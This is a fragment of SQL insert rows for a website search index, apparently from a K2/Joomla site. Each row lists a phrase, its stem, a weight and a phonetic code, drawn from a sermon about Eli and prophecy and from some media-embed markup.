(288601, 'in turn was', 'in turn was', 0, 1, 1.3667, 'I53652', 1, '*'),
(288602, 'into utter', 'into utter', 0, 1, 1.3333, 'I536', 1, '*'),
(288603, 'into utter destruction', 'into utter destruction', 0, 1, 1.7333, 'I5363236235', 1, '*'),
(288604, 'it leads', 'it leads', 0, 1, 1.2667, 'I3432', 1, '*'),
(288605, 'it leads to', 'it leads to', 0, 1, 1.3667, 'I34323', 1, '*'),
(288606, 'it was an', 'it was an', 0, 1, 1.3, 'I325', 1, '*'),
(288607, 'item 42', 'item 42', 0, 1, 1.2333, 'I350', 1, '*'),
(288608, 'item 42 weighed', 'item 42 weighed', 0, 1, 1.5, 'I3523', 1, '*'),
(288609, 'judged him', 'judg him', 0, 1, 1.3333, 'J3235', 1, '*'),
(288610, 'judged him never', 'judg him never', 0, 1, 1.5333, 'J323516', 1, '*'),
(288611, 'judgment 4', 'judgment 4', 0, 1, 1.3333, 'J3253', 1, '*'),
(288612, 'judgment 4 eli', 'judgment 4 eli', 0, 1, 1.4667, 'J32534', 1, '*'),
(288613, 'judgment he', 'judgment he', 0, 1, 1.3667, 'J3253', 1, '*'),
(288614, 'judgment he worshipped', 'judgment he worshipped', 0, 1, 1.7333, 'J32536213', 1, '*'),
(288615, 'just weight 6', 'just weight 6', 0, 1, 1.4333, 'J323', 1, '*'),
(288616, 'just weight and', 'just weight and', 0, 1, 1.5, 'J32353', 1, '*'),
(288617, 'k2 item 42', 'k2 item 42', 0, 1, 1.3333, 'K350', 1, '*'),
(288618, 'leadership eli', 'leadership eli', 0, 1, 1.4667, 'L36214', 1, '*'),
(288619, 'leadership eli was', 'leadership eli was', 0, 1, 1.6, 'L362142', 1, '*'),
(288620, 'leads to loss', 'lead to loss', 0, 1, 1.4333, 'L32342', 1, '*'),
(288621, 'lie once', 'lie once', 0, 1, 1.2667, 'L520', 1, '*'),
(288622, 'lie once god', 'lie once god', 0, 1, 1.4, 'L523', 1, '*'),
(288623, 'looked at various', 'look at various', 0, 1, 1.5667, 'L23162', 1, '*'),
(288624, 'lord depend', 'lord depend', 0, 1, 1.3667, 'L63153', 1, '*'),
(288625, 'lord depend on', 'lord depend on', 0, 1, 1.4667, 'L631535', 1, '*'),
(288626, 'lord this', 'lord this', 0, 1, 1.3, 'L632', 1, '*'),
(288627, 'lord this most', 'lord this most', 0, 1, 1.4667, 'L632523', 1, '*'),
(288628, 'loss', 'loss', 0, 0, 0.2667, 'L200', 1, '*'),
(288629, 'loss of', 'loss of', 0, 1, 1.2333, 'L210', 1, '*'),
(288630, 'loss of gifts', 'loss of gifts', 0, 1, 1.4333, 'L212132', 1, '*'),
(288631, 'make god', 'make god', 0, 1, 1.2667, 'M230', 1, '*'),
(288632, 'make god to', 'make god to', 0, 1, 1.3667, 'M230', 1, '*'),
(288633, 'man respected', 'man respected', 0, 1, 1.4333, 'M62123', 1, '*'),
(288634, 'man respected the', 'man respected the', 0, 1, 1.5667, 'M62123', 1, '*'),
(288635, 'matter it', 'matter it', 0, 1, 1.3, 'M363', 1, '*'),
(288636, 'matter it doesn\'t', 'matter it doesn', 0, 1, 1.5667, 'M363253', 1, '*'),
(288637, 'matter who', 'matter who', 0, 1, 1.3333, 'M360', 1, '*'),
(288638, 'matter who comes', 'matter who comes', 0, 1, 1.5333, 'M36252', 1, '*'),
(288639, 'may the', 'mai the', 0, 1, 1.2333, 'M300', 1, '*'),
(288640, 'may the lord', 'mai the lord', 0, 1, 1.4, 'M3463', 1, '*'),
(288641, 'member because', 'member because', 0, 1, 1.4667, 'M1612', 1, '*'),
(288642, 'member because of', 'member because of', 0, 1, 1.5667, 'M16121', 1, '*'),
(288643, 'mind about', 'mind about', 0, 1, 1.3333, 'M313', 1, '*'),
(288644, 'mind about your', 'mind about your', 0, 1, 1.5, 'M3136', 1, '*'),
(288645, 'money for', 'monei for', 0, 1, 1.3, 'M160', 1, '*'),
(288646, 'money for prophecy', 'monei for prophecy', 0, 1, 1.6, 'M161612', 1, '*'),
(288647, 'most times', 'most times', 0, 1, 1.3333, 'M2352', 1, '*'),
(288648, 'most times applies', 'most times applies', 0, 1, 1.6, 'M2352142', 1, '*'),
(288649, 'much in', 'much in', 0, 1, 1.2333, 'M250', 1, '*'),
(288650, 'much in the', 'much in the', 0, 1, 1.3667, 'M253', 1, '*'),
(288651, 'must not be', 'must not be', 0, 1, 1.3667, 'M23531', 1, '*'),
(288652, 'never attempt', 'never attempt', 0, 1, 1.4333, 'N163513', 1, '*'),
(288653, 'never attempt to', 'never attempt to', 0, 1, 1.5333, 'N163513', 1, '*'),
(288654, 'next thing will', 'next thing will', 0, 1, 1.5, 'N23524', 1, '*'),
(288655, 'not be used', 'not be used', 0, 1, 1.3667, 'N3123', 1, '*'),
(288656, 'num', 'num', 0, 0, 0.2, 'N000', 1, '*'),
(288657, 'num 22', 'num 22', 0, 1, 1.2, 'N000', 1, '*'),
(288658, 'num 22 5-12', 'num 22 5-12', 0, 1, 1.3667, 'N000', 1, '*'),
(288659, 'obey them', 'obei them', 0, 1, 1.3, 'O135', 1, '*'),
(288660, 'obey them and', 'obei them and', 0, 1, 1.4333, 'O1353', 1, '*'),
(288661, 'of emotional', 'of emotional', 0, 1, 1.4, 'O15354', 1, '*'),
(288662, 'of emotional attachments', 'of emotional attachments', 0, 1, 1.8, 'O1535432532', 1, '*'),
(288663, 'of establishing', 'of establishing', 0, 1, 1.5, 'O12314252', 1, '*'),
(288664, 'of establishing divine', 'of establishing divine', 0, 1, 1.7333, 'O12314252315', 1, '*'),
(288665, 'of gifts', 'of gifts', 0, 1, 1.2667, 'O12132', 1, '*'),
(288666, 'of gifts then', 'of gifts then', 0, 1, 1.4333, 'O1213235', 1, '*'),
(288667, 'of god must', 'of god must', 0, 1, 1.3667, 'O123523', 2, '*'),
(288668, 'of god\'s people', 'of god people', 0, 1, 1.5, 'O123214', 2, '*'),
(288669, 'of the eternal', 'of the eternal', 0, 1, 1.4667, 'O13654', 1, '*'),
(288670, 'older prophet', 'older prophet', 0, 1, 1.4333, 'O4361613', 1, '*'),
(288671, 'older prophet to', 'older prophet to', 0, 1, 1.5333, 'O4361613', 1, '*'),
(288672, 'on a matter', 'on a matter', 0, 1, 1.3667, 'O536', 1, '*'),
(288673, 'once god', 'onc god', 0, 1, 1.2667, 'O523', 1, '*'),
(288674, 'once god has', 'onc god has', 0, 1, 1.4, 'O5232', 1, '*'),
(288675, 'opinion contrary', 'opinion contrary', 0, 1, 1.5333, 'O152536', 1, '*'),
(288676, 'opinion contrary to', 'opinion contrary to', 0, 1, 1.6333, 'O1525363', 1, '*'),
(288677, 'people he', 'peopl he', 0, 1, 1.3, 'P400', 1, '*'),
(288678, 'people he died', 'peopl he died', 0, 1, 1.4667, 'P430', 1, '*'),
(288679, 'people in leadership', 'peopl in leadership', 0, 1, 1.6667, 'P4543621', 1, '*'),
(288680, 'priest', 'priest', 0, 0, 0.4, 'P623', 1, '*'),
(288681, 'priest 1samuel', 'priest 1samuel', 0, 1, 1.4667, 'P623254', 1, '*'),
(288682, 'priest 1samuel 2', 'priest 1samuel 2', 0, 1, 1.5333, 'P623254', 1, '*'),
(288683, 'priesthood', 'priesthood', 0, 0, 0.6667, 'P623', 1, '*'),
(288684, 'priesthood he', 'priesthood he', 0, 1, 1.4333, 'P623', 1, '*'),
(288685, 'priesthood he failed', 'priesthood he failed', 0, 1, 1.6667, 'P623143', 1, '*'),
(288686, 'problem wasn\'t', 'problem wasn', 0, 1, 1.4667, 'P6145253', 1, '*'),
(288687, 'problem wasn\'t food', 'problem wasn food', 0, 1, 1.6333, 'P614525313', 1, '*'),
(288688, 'proceed today', 'proce today', 0, 1, 1.4333, 'P623', 1, '*'),
(288689, 'proceed today to', 'proce today to', 0, 1, 1.5333, 'P623', 1, '*'),
(288690, 'prophecy god', 'propheci god', 0, 1, 1.4, 'P6123', 1, '*'),
(288691, 'prophecy god judged', 'propheci god judged', 0, 1, 1.6333, 'P61232323', 1, '*'),
(288692, 'prophecy may', 'propheci may', 0, 1, 1.4, 'P6125', 1, '*'),
(288693, 'prophecy may the', 'propheci may the', 0, 1, 1.5333, 'P61253', 1, '*'),
(288694, 'prophet 1king', 'prophet 1king', 0, 1, 1.4333, 'P613252', 1, '*'),
(288695, 'prophet 1king 19', 'prophet 1king 19', 0, 1, 1.5333, 'P613252', 1, '*'),
(288696, 'prophet to', 'prophet to', 0, 1, 1.3333, 'P613', 1, '*'),
(288697, 'prophet to a', 'prophet to a', 0, 1, 1.4, 'P613', 1, '*'),
(288698, 'read vs', 'read vs', 0, 1, 1.2333, 'R312', 1, '*'),
(288699, 'read vs 1-9', 'read vs 1-9', 0, 1, 1.3667, 'R312', 1, '*'),
(288700, 'ready to do', 'readi to do', 0, 1, 1.3667, 'R300', 1, '*'),
(288701, 'receive worldly', 'receiv worldly', 0, 1, 1.5, 'R216434', 1, '*'),
(288702, 'receive worldly gain', 'receiv worldly gain', 0, 1, 1.6667, 'R21643425', 1, '*'),
(288703, 'refused', 'refus', 0, 0, 0.4667, 'R123', 1, '*'),
(288704, 'refused to', 'refus to', 0, 1, 1.3333, 'R123', 1, '*'),
(288705, 'refused to acknowledge', 'refus to acknowledge', 0, 1, 1.7333, 'R12325432', 1, '*'),
(288706, 'respect but', 'respect but', 0, 1, 1.3667, 'R212313', 1, '*'),
(288707, 'respect but he', 'respect but he', 0, 1, 1.4667, 'R212313', 1, '*'),
(288708, 'respect so', 'respect so', 0, 1, 1.3333, 'R21232', 1, '*'),
(288709, 'respect so much', 'respect so much', 0, 1, 1.5, 'R2123252', 1, '*'),
(288710, 'respected a', 'respect a', 0, 1, 1.3667, 'R2123', 1, '*'),
(288711, 'respected a wrong', 'respect a wrong', 0, 1, 1.5667, 'R2123652', 1, '*'),
(288712, 'respected the', 'respect the', 0, 1, 1.4333, 'R2123', 1, '*'),
(288713, 'respected the older', 'respect the older', 0, 1, 1.6333, 'R2123436', 1, '*'),
(288714, 'rev.2', 'rev.2', 0, 0, 0.3333, 'R100', 1, '*'),
(288715, 'rev.2 1-29', 'rev.2 1-29', 0, 1, 1.3333, 'R100', 1, '*'),
(288716, 'rev.2 1-29 3', 'rev.2 1-29 3', 0, 1, 1.4, 'R100', 1, '*'),
(288717, 'rom.5', 'rom.5', 0, 0, 0.3333, 'R500', 1, '*'),
(288718, 'rom.5 3-5', 'rom.5 3-5', 0, 1, 1.3, 'R500', 1, '*'),
(288719, 'sayer', 'sayer', 0, 0, 0.3333, 'S600', 1, '*'),
(288720, 'sayer the', 'sayer the', 0, 1, 1.3, 'S630', 1, '*'),
(288721, 'sayer the gift', 'sayer the gift', 0, 1, 1.4667, 'S63213', 1, '*'),
(288722, 'secondly', 'secondli', 0, 0, 0.5333, 'S534', 2, '*'),
(288723, 'secondly he', 'secondli he', 0, 1, 1.3667, 'S534', 1, '*'),
(288724, 'secondly he was', 'secondli he was', 0, 1, 1.5, 'S5342', 1, '*'),
(288725, 'see the act', 'see the act', 0, 1, 1.3667, 'S323', 1, '*'),
(288726, 'see those', 'see those', 0, 1, 1.3, 'S320', 1, '*'),
(288727, 'see those that', 'see those that', 0, 1, 1.4667, 'S323', 1, '*'),
(288728, 'so much in', 'so much in', 0, 1, 1.3333, 'S525', 1, '*'),
(288729, 'sons above', 'son above', 0, 1, 1.3333, 'S521', 1, '*'),
(288730, 'sons above god', 'son above god', 0, 1, 1.4667, 'S52123', 1, '*'),
(288731, 'sooth', 'sooth', 0, 0, 0.3333, 'S300', 1, '*'),
(288732, 'sooth sayer', 'sooth sayer', 0, 1, 1.3667, 'S326', 1, '*'),
(288733, 'sooth sayer the', 'sooth sayer the', 0, 1, 1.5, 'S3263', 1, '*'),
(288734, 'spoken on', 'spoken on', 0, 1, 1.3, 'S125', 1, '*'),
(288735, 'spoken on a', 'spoken on a', 0, 1, 1.3667, 'S125', 1, '*'),
(288736, 'standards in', 'standard in', 0, 1, 1.4, 'S3536325', 1, '*'),
(288737, 'standards in the', 'standard in the', 0, 1, 1.5333, 'S35363253', 1, '*'),
(288738, 'that god considered', 'that god considered', 0, 1, 1.6333, 'T23252363', 1, '*'),
(288739, 'that god weighed', 'that god weighed', 0, 1, 1.5333, 'T2323', 1, '*'),
(288740, 'that he embarked', 'that he embarked', 0, 1, 1.5333, 'T51623', 1, '*'),
(288741, 'that when they', 'that when they', 0, 1, 1.4667, 'T530', 1, '*'),
(288742, 'the act that', 'the act that', 0, 1, 1.4, 'T230', 1, '*'),
(288743, 'the eternal', 'the eternal', 0, 1, 1.3667, 'T654', 1, '*'),
(288744, 'the eternal priesthood', 'the eternal priesthood', 0, 1, 1.7333, 'T6541623', 1, '*'),
(288745, 'the fear', 'the fear', 0, 1, 1.2667, 'T160', 1, '*'),
(288746, 'the fear the', 'the fear the', 0, 1, 1.4, 'T163', 1, '*'),
(288747, 'the gift', 'the gift', 0, 1, 1.2667, 'T213', 1, '*'),
(288748, 'the gift of', 'the gift of', 0, 1, 1.3667, 'T2131', 1, '*'),
(288749, 'the lord depend', 'the lord depend', 0, 1, 1.5, 'T463153', 1, '*'),
(288750, 'the lord this', 'the lord this', 0, 1, 1.4333, 'T4632', 1, '*'),
(288751, 'the older', 'the older', 0, 1, 1.3, 'T436', 1, '*'),
(288752, 'the older prophet', 'the older prophet', 0, 1, 1.5667, 'T4361613', 1, '*'),
(288753, 'the priest', 'the priest', 0, 1, 1.3333, 'T1623', 1, '*'),
(288754, 'the priest 1samuel', 'the priest 1samuel', 0, 1, 1.6, 'T1623254', 1, '*'),
(288755, 'them and disobey', 'them and disobey', 0, 1, 1.5333, 'T5321', 1, '*'),
(288756, 'then destruction', 'then destruction', 0, 1, 1.5333, 'T53236235', 1, '*'),
(288757, 'then destruction 3', 'then destruction 3', 0, 1, 1.6, 'T53236235', 1, '*'),
(288758, 'they have an', 'thei have an', 0, 1, 1.4, 'T150', 1, '*'),
(288759, 'thing before', 'thing before', 0, 1, 1.4, 'T5216', 1, '*'),
(288760, 'thing before divine', 'thing before divine', 0, 1, 1.6333, 'T5216315', 1, '*'),
(288761, 'thing will', 'thing will', 0, 1, 1.3333, 'T524', 1, '*'),
(288762, 'thing will be', 'thing will be', 0, 1, 1.4333, 'T5241', 1, '*'),
(288763, 'things under', 'thing under', 0, 1, 1.4, 'T52536', 1, '*'),
(288764, 'things under the', 'thing under the', 0, 1, 1.5333, 'T525363', 1, '*'),
(288765, 'this man', 'thi man', 0, 1, 1.2667, 'T250', 1, '*'),
(288766, 'this man respected', 'thi man respected', 0, 1, 1.6, 'T2562123', 1, '*'),
(288767, 'this most', 'thi most', 0, 1, 1.3, 'T2523', 1, '*'),
(288768, 'this most times', 'thi most times', 0, 1, 1.5, 'T252352', 1, '*'),
(288769, 'those that god', 'those that god', 0, 1, 1.4667, 'T2323', 1, '*'),
(288770, 'times applies', 'time applies', 0, 1, 1.4333, 'T52142', 1, '*'),
(288771, 'times applies to', 'time applies to', 0, 1, 1.5333, 'T521423', 1, '*'),
(288772, 'to a fault', 'to a fault', 0, 1, 1.3333, 'T143', 1, '*'),
(288773, 'to acknowledge', 'to acknowledge', 0, 1, 1.4667, 'T25432', 1, '*'),
(288774, 'to acknowledge god', 'to acknowledge god', 0, 1, 1.6, 'T254323', 1, '*'),
(288775, 'to commercialize', 'to commercialize', 0, 1, 1.5333, 'T256242', 1, '*'),
(288776, 'to commercialize your', 'to commercialize your', 0, 1, 1.7, 'T2562426', 1, '*'),
(288777, 'to do it', 'to do it', 0, 1, 1.2667, 'T000', 2, '*'),
(288778, 'to god\'s expressed', 'to god expressed', 0, 1, 1.6, 'T2321623', 1, '*'),
(288779, 'to loss', 'to loss', 0, 1, 1.2333, 'T420', 1, '*'),
(288780, 'to loss of', 'to loss of', 0, 1, 1.3333, 'T421', 1, '*'),
(288781, 'to people in', 'to people in', 0, 1, 1.4, 'T145', 1, '*'),
(288782, 'to receive worldly', 'to receive worldly', 0, 1, 1.6, 'T6216434', 1, '*'),
(288783, 'to see those', 'to see those', 0, 1, 1.4, 'T232', 1, '*'),
(288784, 'today to see', 'todai to see', 0, 1, 1.4, 'T200', 1, '*'),
(288785, 'towards a', 'toward a', 0, 1, 1.3, 'T632', 1, '*'),
(288786, 'towards a family', 'toward a family', 0, 1, 1.5333, 'T632154', 1, '*'),
(288787, 'turn was', 'turn was', 0, 1, 1.2667, 'T652', 1, '*'),
(288788, 'turn was unqualified', 'turn was unqualified', 0, 1, 1.6667, 'T65252413', 1, '*'),
(288789, 'under the just', 'under the just', 0, 1, 1.4667, 'U536323', 1, '*'),
(288790, 'unjust', 'unjust', 0, 0, 0.4, 'U523', 1, '*'),
(288791, 'unjust thing', 'unjust thing', 0, 1, 1.4, 'U52352', 1, '*'),
(288792, 'unjust thing before', 'unjust thing before', 0, 1, 1.6333, 'U5235216', 1, '*'),
(288793, 'unqualified', 'unqualifi', 0, 0, 0.7333, 'U52413', 1, '*'),
(288794, 'unqualified for', 'unqualifi for', 0, 1, 1.5, 'U5241316', 1, '*'),
(288795, 'unqualified for future', 'unqualifi for future', 0, 1, 1.7333, 'U5241316136', 1, '*'),
(288796, 'unworthy', 'unworthi', 0, 0, 0.5333, 'U563', 1, '*'),
(288797, 'unworthy of', 'unworthi of', 0, 1, 1.3667, 'U5631', 1, '*'),
(288798, 'unworthy of the', 'unworthi of the', 0, 1, 1.5, 'U56313', 1, '*'),
(288799, 'up with what', 'up with what', 0, 1, 1.4, 'U130', 1, '*'),
(288800, 'upon that', 'upon that', 0, 1, 1.3, 'U153', 1, '*'),
(288801, 'upon that god', 'upon that god', 0, 1, 1.4333, 'U15323', 1, '*'),
(288802, 'used to receive', 'us to receive', 0, 1, 1.5, 'U23621', 1, '*'),
(288803, 'utter', 'utter', 0, 0, 0.3333, 'U360', 1, '*'),
(288804, 'utter destruction', 'utter destruction', 0, 1, 1.5667, 'U363236235', 1, '*'),
(288805, 'utter destruction 1', 'utter destruction 1', 0, 1, 1.6333, 'U363236235', 1, '*'),
(288806, 'value who', 'valu who', 0, 1, 1.3, 'V400', 1, '*'),
(288807, 'value who do', 'valu who do', 0, 1, 1.4, 'V430', 1, '*'),
(288808, 'various', 'variou', 0, 0, 0.4667, 'V620', 1, '*'),
(288809, 'various things', 'variou things', 0, 1, 1.4667, 'V62352', 1, '*'),
(288810, 'various things under', 'variou things under', 0, 1, 1.6667, 'V62352536', 1, '*'),
(288811, 'vs 1-9', 'vs 1-9', 0, 1, 1.2, 'V200', 1, '*'),
(288812, 'vs 1-9 you\'ll', 'vs 1-9 you', 0, 1, 1.4333, 'V240', 1, '*'),
(288813, 'wanted', 'want', 0, 0, 0.4, 'W530', 1, '*'),
(288814, 'wanted a', 'want a', 0, 1, 1.2667, 'W530', 1, '*'),
(288815, 'wanted a worldly', 'want a worldly', 0, 1, 1.5333, 'W536434', 1, '*'),
(288816, 'wanting and', 'want and', 0, 1, 1.3667, 'W535253', 1, '*'),
(288817, 'wanting and in', 'want and in', 0, 1, 1.4667, 'W5352535', 1, '*'),
(288818, 'was an', 'wa an', 0, 1, 1.2, 'W250', 1, '*'),
(288819, 'was an unjust', 'wa an unjust', 0, 1, 1.4333, 'W2523', 1, '*'),
(288820, 'was deceived', 'wa deceived', 0, 1, 1.4, 'W23213', 1, '*'),
(288821, 'was deceived he', 'wa deceived he', 0, 1, 1.5, 'W23213', 1, '*'),
(288822, 'was even', 'wa even', 0, 1, 1.2667, 'W215', 1, '*'),
(288823, 'was even ready', 'wa even ready', 0, 1, 1.4667, 'W21563', 1, '*'),
(288824, 'was found', 'wa found', 0, 1, 1.3, 'W2153', 1, '*'),
(288825, 'was found wanting', 'wa found wanting', 0, 1, 1.5667, 'W21535352', 1, '*'),
(288826, 'was unqualified', 'wa unqualified', 0, 1, 1.5, 'W252413', 1, '*'),
(288827, 'was unqualified for', 'wa unqualified for', 0, 1, 1.6333, 'W25241316', 1, '*'),
(288828, 'wasn\'t food', 'wasn food', 0, 1, 1.3667, 'W25313', 1, '*'),
(288829, 'wasn\'t food but', 'wasn food but', 0, 1, 1.5, 'W2531313', 1, '*'),
(288830, 'we proceed', 'we proceed', 0, 1, 1.3333, 'W1623', 1, '*'),
(288831, 'we proceed today', 'we proceed today', 0, 1, 1.5333, 'W1623', 1, '*'),
(288832, 'we\'ve looked', 'we looked', 0, 1, 1.4, 'W1423', 1, '*'),
(288833, 'we\'ve looked at', 'we looked at', 0, 1, 1.5, 'W1423', 1, '*'),
(288834, 'weakness towards', 'weak towards', 0, 1, 1.5333, 'W2523632', 1, '*'),
(288835, 'weakness towards a', 'weak towards a', 0, 1, 1.6, 'W2523632', 1, '*'),
(288836, 'weighed and', 'weigh and', 0, 1, 1.3667, 'W2353', 1, '*'),
(288837, 'weighed and failed', 'weigh and failed', 0, 1, 1.6, 'W2353143', 1, '*'),
(288838, 'weight 6', 'weight 6', 0, 1, 1.2667, 'W230', 1, '*'),
(288839, 'weight 6 rev.2', 'weight 6 rev.2', 0, 1, 1.4667, 'W2361', 1, '*'),
(288840, 'weight and', 'weight and', 0, 1, 1.3333, 'W2353', 1, '*'),
(288841, 'weight and we', 'weight and we', 0, 1, 1.4333, 'W2353', 1, '*'),
(288842, 'went into', 'went into', 0, 1, 1.3, 'W5353', 1, '*'),
(288843, 'went into utter', 'went into utter', 0, 1, 1.5, 'W53536', 1, '*'),
(288844, 'what after', 'what after', 0, 1, 1.3333, 'W3136', 1, '*'),
(288845, 'what after that', 'what after that', 0, 1, 1.5, 'W31363', 1, '*'),
(288846, 'when they have', 'when they have', 0, 1, 1.4667, 'W531', 2, '*'),
(288847, 'who comes', 'who comes', 0, 1, 1.3, 'W252', 1, '*'),
(288848, 'who comes up', 'who comes up', 0, 1, 1.4, 'W2521', 1, '*'),
(288849, 'who do', 'who do', 0, 1, 1.2, 'W300', 1, '*'),
(288850, 'who do you', 'who do you', 0, 1, 1.3333, 'W300', 1, '*'),
(288851, 'will be judgment', 'will be judgment', 0, 1, 1.5333, 'W4123253', 1, '*'),
(288852, 'will for', 'will for', 0, 1, 1.2667, 'W416', 1, '*'),
(288853, 'will for you', 'will for you', 0, 1, 1.4, 'W416', 1, '*'),
(288854, 'will make god', 'will make god', 0, 1, 1.4333, 'W4523', 1, '*'),
(288855, 'with what after', 'with what after', 0, 1, 1.5, 'W3136', 1, '*'),
(288856, 'worldly gain', 'worldli gain', 0, 1, 1.4, 'W643425', 1, '*'),
(288857, 'worldly gain and', 'worldli gain and', 0, 1, 1.5333, 'W6434253', 1, '*'),
(288858, 'worldly gain he', 'worldli gain he', 0, 1, 1.5, 'W643425', 1, '*'),
(288859, 'worshipped', 'worship', 0, 0, 0.6667, 'W6213', 1, '*'),
(288860, 'worshipped another', 'worship another', 0, 1, 1.6, 'W6213536', 1, '*'),
(288861, 'worshipped another god', 'worship another god', 0, 1, 1.7333, 'W621353623', 1, '*'),
(288862, 'wrong value', 'wrong value', 0, 1, 1.3667, 'W65214', 1, '*'),
(288863, 'wrong value who', 'wrong value who', 0, 1, 1.5, 'W65214', 1, '*'),
(288864, 'you disobey', 'you disobey', 0, 1, 1.3667, 'Y321', 1, '*'),
(288865, 'you disobey god', 'you disobey god', 0, 1, 1.5, 'Y32123', 1, '*'),
(288866, 'you doing', 'you doing', 0, 1, 1.3, 'Y352', 2, '*'),
(288867, 'you doing anything', 'you doing anything', 0, 1, 1.6, 'Y3525352', 1, '*'),
(288868, 'you exhibit', 'you exhibit', 0, 1, 1.3667, 'Y213', 1, '*'),
(288869, 'you exhibit funny', 'you exhibit funny', 0, 1, 1.5667, 'Y21315', 1, '*'),
(288870, 'you read', 'you read', 0, 1, 1.2667, 'Y630', 1, '*'),
(288871, 'you read vs', 'you read vs', 0, 1, 1.3667, 'Y6312', 1, '*'),
(288872, 'you respect', 'you respect', 0, 1, 1.3667, 'Y62123', 1, '*'),
(288873, 'you respect so', 'you respect so', 0, 1, 1.4667, 'Y621232', 1, '*'),
(288874, 'you you\'ll', 'you you', 0, 1, 1.3333, 'Y400', 1, '*'),
(288875, 'you you\'ll obey', 'you you obey', 0, 1, 1.5, 'Y410', 1, '*'),
(288876, 'you\'ll obey', 'you obey', 0, 1, 1.3667, 'Y410', 1, '*'),
(288877, 'you\'ll obey them', 'you obey them', 0, 1, 1.5333, 'Y4135', 1, '*'),
(288878, 'you\'ll see', 'you see', 0, 1, 1.3333, 'Y420', 1, '*'),
(288879, 'you\'ll see the', 'you see the', 0, 1, 1.4667, 'Y423', 1, '*'),
(288880, 'young prophet', 'young prophet', 0, 1, 1.4333, 'Y521613', 1, '*'),
(288881, 'young prophet 1king', 'young prophet 1king', 0, 1, 1.6333, 'Y521613252', 1, '*'),
(288882, 'your gifting', 'your gifting', 0, 1, 1.4, 'Y621352', 1, '*'),
(288883, 'your gifting from', 'your gifting from', 0, 1, 1.5667, 'Y621352165', 1, '*'),
(288884, 'your prophecy may', 'your prophecy may', 0, 1, 1.5667, 'Y616125', 1, '*'),
(289339, '5 music', '5 music', 0, 1, 1.2333, 'M200', 1, '*'),
(289340, '5 music is', '5 music is', 0, 1, 1.3333, 'M200', 1, '*'),
(289341, 'audio', 'audio', 0, 0, 0.3333, 'A300', 1, '*'),
(289342, 'audio le', 'audio le', 0, 1, 1.2667, 'A340', 1, '*'),
(289343, 'audio le festin', 'audio le festin', 0, 1, 1.5, 'A341235', 1, '*'),
(289344, 'audio mpeg', 'audio mpeg', 0, 1, 1.3333, 'A3512', 1, '*'),
(289345, 'audio mpeg audio', 'audio mpeg audio', 0, 1, 1.5333, 'A35123', 1, '*'),
(289346, 'audio perhaps', 'audio perhaps', 0, 1, 1.4333, 'A31612', 1, '*'),
(289347, 'audio perhaps travel', 'audio perhaps travel', 0, 1, 1.6667, 'A316123614', 1, '*'),
(289348, 'audio src', 'audio src', 0, 1, 1.3, 'A3262', 1, '*'),
(289349, 'audio src images', 'audio src images', 0, 1, 1.5333, 'A326252', 1, '*'),
(289350, 'demo audio', 'demo audio', 0, 1, 1.3333, 'D530', 1, '*'),
(289351, 'demo audio le', 'demo audio le', 0, 1, 1.4333, 'D534', 1, '*'),
(289352, 'festin', 'festin', 0, 0, 0.4, 'F235', 1, '*'),
(289353, 'festin mp3', 'festin mp3', 0, 1, 1.3333, 'F2351', 1, '*'),
(289354, 'festin mp3 type', 'festin mp3 type', 0, 1, 1.5, 'F235131', 1, '*'),
(289355, 'food for', 'food for', 0, 1, 1.2667, 'F316', 1, '*'),
(289356, 'food for the', 'food for the', 0, 1, 1.4, 'F3163', 1, '*'),
(289357, 'for the soul', 'for the soul', 0, 1, 1.4, 'F6324', 1, '*'),
(289358, 'images demo audio', 'imag demo audio', 0, 1, 1.5667, 'I52353', 1, '*'),
(289359, 'is food', 'is food', 0, 1, 1.2333, 'I213', 1, '*'),
(289360, 'is food for', 'is food for', 0, 1, 1.3667, 'I21316', 1, '*'),
(289361, 'item 5', 'item 5', 0, 1, 1.2, 'I350', 1, '*'),
(289362, 'item 5 music', 'item 5 music', 0, 1, 1.4, 'I352', 1, '*'),
(289363, 'k2 item 5', 'k2 item 5', 0, 1, 1.3, 'K350', 1, '*'),
(289364, 'le', 'le', 0, 0, 0.1333, 'L000', 1, '*'),
(289365, 'le festin', 'le festin', 0, 1, 1.3, 'L1235', 1, '*'),
(289366, 'le festin mp3', 'le festin mp3', 0, 1, 1.4333, 'L12351', 1, '*'),
(289367, 'mp3', 'mp3', 0, 0, 0.2, 'M100', 1, '*'),
(289368, 'mp3 type', 'mp3 type', 0, 1, 1.2667, 'M131', 1, '*'),
(289369, 'mp3 type audio', 'mp3 type audio', 0, 1, 1.4667, 'M1313', 1, '*'),
(289370, 'mpeg', 'mpeg', 0, 0, 0.2667, 'M120', 1, '*'),
(289371, 'mpeg audio', 'mpeg audio', 0, 1, 1.3333, 'M123', 1, '*'),
(289372, 'mpeg audio perhaps', 'mpeg audio perhaps', 0, 1, 1.6, 'M1231612', 1, '*'),
(289373, 'music is', 'music is', 0, 1, 1.2667, 'M200', 1, '*'),
(289374, 'music is food', 'music is food', 0, 1, 1.4333, 'M213', 1, '*'),
(289375, 'src', 'src', 0, 0, 0.2, 'S620', 1, '*'),
(289376, 'src images', 'src images', 0, 1, 1.3333, 'S6252', 1, '*'),
(289377, 'src images demo', 'src images demo', 0, 1, 1.5, 'S625235', 1, '*'),
(289378, 'type audio', 'type audio', 0, 1, 1.3333, 'T130', 1, '*'),
(289379, 'type audio mpeg', 'type audio mpeg', 0, 1, 1.5, 'T13512', 1, '*'),
(289402, '100', '100', 0, 0, 0.3, '', 1, '*'),
(289403, '100 height', '100 height', 0, 1, 1.3333, 'H230', 1, '*'),
(289404, '100 height 420', '100 height 420', 0, 1, 1.4667, 'H230', 1, '*'),
(289405, '420', '420', 0, 0, 0.3, '', 1, '*'),
(289406, '420 poster', '420 poster', 0, 1, 1.3333, 'P236', 1, '*'),
(289407, '420 poster images', '420 poster images', 0, 1, 1.5667, 'P23652', 1, '*'),
(289408, '6 you only', '6 you only', 0, 1, 1.3333, 'Y540', 1, '*'),
(289409, 'bg', 'bg', 0, 0, 0.1333, 'B200', 1, '*'),
(289410, 'bg png', 'bg png', 0, 1, 1.2, 'B2152', 1, '*'),
(289411, 'bg png source', 'bg png source', 0, 1, 1.4333, 'B215262', 1, '*'),
(289412, 'demo video', 'demo video', 0, 1, 1.3333, 'D513', 1, '*'),
(289413, 'demo video envato', 'demo video envato', 0, 1, 1.5667, 'D513513', 1, '*'),
(289414, 'demo video movie', 'demo video movie', 0, 1, 1.5333, 'D51351', 1, '*'),
(289415, 'envato', 'envato', 0, 0, 0.4, 'E513', 1, '*'),
(289416, 'envato sting', 'envato sting', 0, 1, 1.4, 'E5132352', 1, '*'),
